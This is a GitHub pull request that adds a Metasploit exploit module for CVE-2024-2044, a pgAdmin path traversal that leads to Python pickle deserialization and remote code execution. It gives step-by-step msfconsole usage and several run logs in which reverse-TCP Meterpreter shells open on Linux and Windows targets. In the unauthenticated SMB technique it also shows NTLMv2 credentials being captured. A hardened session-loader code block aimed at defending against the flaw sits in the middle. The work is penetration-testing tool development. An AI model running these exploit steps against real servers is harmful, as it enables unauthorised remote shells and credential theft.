
Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE) #19026

Merged: 9 commits, Apr 16, 2024

Conversation

zeroSteiner
Contributor

@zeroSteiner zeroSteiner commented Mar 29, 2024

This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.

Important notes from the exploit description:

This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled.

Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefore, pgAdmin versions < 7.0 cannot utilize the authenticated technique whereby a payload is uploaded.

This requires the changes from:

Verification

  • Install the application
  • Start msfconsole
  • Do: use exploit/multi/http/pgadmin_session_deserialization
  • Set the RHOST, PAYLOAD, and optionally the USERNAME and PASSWORD options
  • Do: run
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
RHOSTS => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
RPORT => 8080
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME user@gmail.com
USERNAME => user@gmail.com
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Triggering deserialization for path: ../storage/user_gmail.com/eos.json
[*] Sending stage (24768 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : 27b165126272
OS           : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar  6 19:35:04 UTC 2024
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/pgadmin4
meterpreter > 
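As an added example (not pgAdmin's code and not part of this module), here is a hardened session-file loader in Python that closes both halves of the bug class the PR describes: the session id is validated before it ever becomes a path and must resolve inside the session directory, and session data is read with an Unpickler that refuses every global, which any gadget chain (including the new-thread one added here) needs resolved. The directory layout, `is_traversal_attempt` log-review helper and `self_check` harness are assumptions for illustration.

```python
import pickle
import re
import tempfile
from pathlib import Path

# Session ids must be opaque tokens; this alone rejects "../", "\\host\share" and NUL bytes.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9_-]{16,128}")

class SessionPathError(ValueError):
    """Session id is not an opaque token or would resolve outside the session directory."""

def session_file_path(session_dir: str, session_id: str) -> Path:
    """Map a session id to a file strictly inside session_dir (hypothetical layout)."""
    if not SESSION_ID_RE.fullmatch(session_id):
        raise SessionPathError(f"rejected session id {session_id!r}")
    base = Path(session_dir).resolve()
    candidate = (base / session_id).resolve()
    if candidate.parent != base:  # defence in depth against symlink/normalisation escapes
        raise SessionPathError("session path escapes the session directory")
    return candidate

class RestrictedUnpickler(pickle.Unpickler):
    """Session data needs only primitives, lists and dicts, so every global is refused;
    a gadget chain (such as one that runs code in a new thread) must resolve at least
    one global, which makes find_class the choke point."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden in session data")

def load_session(session_dir: str, session_id: str) -> dict:
    with open(session_file_path(session_dir, session_id), "rb") as fh:
        return RestrictedUnpickler(fh).load()

def is_traversal_attempt(session_id: str) -> bool:
    # Log-review helper (hypothetical): flags the trigger shapes visible in the module output above.
    return ("../" in session_id or "..\\" in session_id
            or session_id.startswith("\\\\") or not SESSION_ID_RE.fullmatch(session_id))

def self_check() -> dict:
    # Runs the loader on constructed session files and returns the outcome of each case.
    out, good_id, bad_id = {}, "sessionAAAAAAAAAAAAAAAA", "sessionBBBBBBBBBBBBBBBB"
    with tempfile.TemporaryDirectory() as d:
        Path(d, good_id).write_bytes(pickle.dumps({"user": "alice"}))
        # Any pickled global stands in for a gadget chain (constructed, harmless reference).
        Path(d, bad_id).write_bytes(pickle.dumps(tempfile.gettempdir))
        out["benign"] = load_session(d, good_id)
        for label, sid in (("gadget", bad_id), ("traversal", "../storage/user_gmail.com/eos.json")):
            try:
                load_session(d, sid)
                out[label] = "loaded"
            except (pickle.UnpicklingError, SessionPathError):
                out[label] = "blocked"
    return out
```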

@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Mar 29, 2024
@zeroSteiner zeroSteiner force-pushed the feat/mod/cve-2024-2044 branch 2 times, most recently from 43d1bd9 to 2e48390 Compare March 30, 2024 16:50
Contributor

@jheysel-r7 jheysel-r7 left a comment


Great module. Thanks for supporting both exploit techniques! A couple minor suggestions. Testing was as expected:

Unix Authenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/metasploit_gmail.com/amet.ods
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/amet.ods
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:57444) at 2024-04-16 10:17:38 -0700

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : 765d0319a1ea
OS           : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2
Architecture : x64
Meterpreter  : python/linux
meterpreter >

Windows Authenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: C:\Users\msfuser\AppData\Roaming\pgAdmin\storage\metasploit_gmail.com/omnis.odt
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/omnis.odt
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:51125) at 2024-04-16 09:23:54 -0700

meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer        : client
OS              : Windows 10 (Build 19045)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter >

Windows Unauthenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Server is running. Listening on 172.16.199.1:445
[*] The SMB service has been started.
[*] Triggering deserialization for path: \\172.16.199.1\fnhlW\ZPPl
[SMB] NTLMv2-SSP Client     : 172.16.199.135
[SMB] NTLMv2-SSP Username   : CLIENT\msfuser

[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.135:49805) at 2024-04-16 10:00:06 -0700
[*] Server stopped.

meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer        : client
OS              : Windows 10 (Build 19045)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter >

@jheysel-r7 jheysel-r7 closed this pull request by merging all changes into rapid7:master in 84ea514 Apr 16, 2024
@jheysel-r7
Contributor

Release Notes

This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request.
